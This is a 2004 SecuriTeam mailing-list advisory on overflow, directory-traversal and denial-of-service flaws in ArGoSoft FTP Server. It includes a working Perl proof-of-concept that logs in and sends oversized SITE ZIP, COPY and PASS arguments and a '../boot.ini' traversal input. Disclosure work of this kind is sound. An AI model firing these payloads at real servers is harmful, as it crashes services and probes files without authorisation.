[NT] ArGoSoft FTP Server Multiple Vulnerabilities (SITE ZIP, UNZIP, COPY, PASS)

• Previous message: SecuriTeam: "[NT] Hidden Gamespy Code Leads to Vulnerabilities in Several Games"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 2 Mar 2004 18:23:44 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  ArGoSoft FTP Server Multiple Vulnerabilities (SITE ZIP, UNZIP, COPY, PASS)
------------------------------------------------------------------------

SUMMARY

STORM has discovered multiple security vulnerabilities in
<http://www.argosoft.com/applications/ftpserver/> ArGoSoft's FTP Server:

1) Three allow overflowing an internal buffer - Buffer Overflows

2) One allows discovering whether a file exist on a server (files that
reside outside the bound FTP root directory) - File Disclosure

3) Another one allows causing a DoS by overwriting critical parts of the
user database file (by the password change mechanism) in such a way that
the user database is no longer useable - Denial of Service

DETAILS

Vulnerable Systems:
 * ArGoSoft version 1.4.1.4 and prior
 * ArGoSoft version 1.4.1.5

Immune Systems:
 * ArGoSoft version 1.4.1.6

Buffer Overflows:
The first two vulnerabilities revolve the use of the SITE ZIP command, the
parameters of that command are not checked for their length, causing the
program to overflow the internal buffer used by the command. The first one
can be caused by sending "SITE ZIP Ax512" (x512 = write the "A" character
512 times), the second one can be caused by sending "SITE ZIP storm.zip
/f:Ax2048". The next vulnerability that causes a buffer overflow is caused
by using the command "SITE COPY", to recreate this send "SITE COPY Ax2048
Ax10".

File Disclosure:
The file disclosure vulnerability is caused by the "SITE UNZIP" command,
the parameter given to the SITE UNZIP command is the file it should unzip,
as the file can contain "../" (i.e. it is not filtered), files that reside
outside the FTP root directory can be verified for their existence (this
is done by comparing the response for ../boot.ini and ../notthere.ini).

Denial of Service:
The denial of service vulnerability is caused by the "SITE PASS" command,
this command receives as a second parameter the new password you are
interested in using, if you give it a password that is very long, the user
database will become corrupt and unusable.

Solution:
Upgrade to the latest version of ArGoSoft FTP Server.

Vendor response:
The vendor was very responsive and quick to fix the issue (within the
first 48 hours), the newest version should fix the above vulnerabilities.
The new version is available from the vendor's web site.

Exploit (for all the vulnerabilities):
#!/usr/bin/perl
# Multiple Vulnerabilities in ArGoSoft FTP Server version 1.4 (1.4.1.4)
# Created by Beyond Security Ltd. - All rights reserved.

use IO::Socket;

$host = "192.168.1.243";

$remote = IO::Socket::INET->new ( Proto => "tcp",
     PeerAddr => $host,
     PeerPort => "2119",,
    );

unless ($remote) { die "cannot connect to ftp daemon on $host" }

print "connected\n";
while (<$remote>)
{
 print $_;
 if (/220 /)
 {
  last;
 }
}

$remote->autoflush(1);

my $ftp = "USER username\r\n";

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/331 /)
 {
  last;
 }
}

$ftp = join("", "PASS ", "password", "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/230 /)
 {
  last;
 }
}

#$ftp = join ("", "SITE ZIP ", "A"x512, "\r\n");
#$ftp = join ("", "SITE ZIP storm.zip /f:", "A"x2048, "\r\n");
#$ftp = join ("", "SITE COPY ", "A"x2048, " ", "A"x10, "\r\n");
#$ftp = join ("", "SITE UNZIP ", "../boot.ini\r\n"); # Directory Traversal
(we know a certain file exists)
#$ftp = join ("", "SITE PASS ", "storm ", "A"x3500, "\r\n"); # DoS ...
against the user database

#Choose one of the above to test the vulnerabilities mentioned

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/250 Done/)
 {
  last;
 }
}

close $remote;

ADDITIONAL INFORMATION

SecurITeam would like to thank <mailto:storm@securiteam.com> STORM for
finding this vulnerability.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[NT] Hidden Gamespy Code Leads to Vulnerabilities in Several Games"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]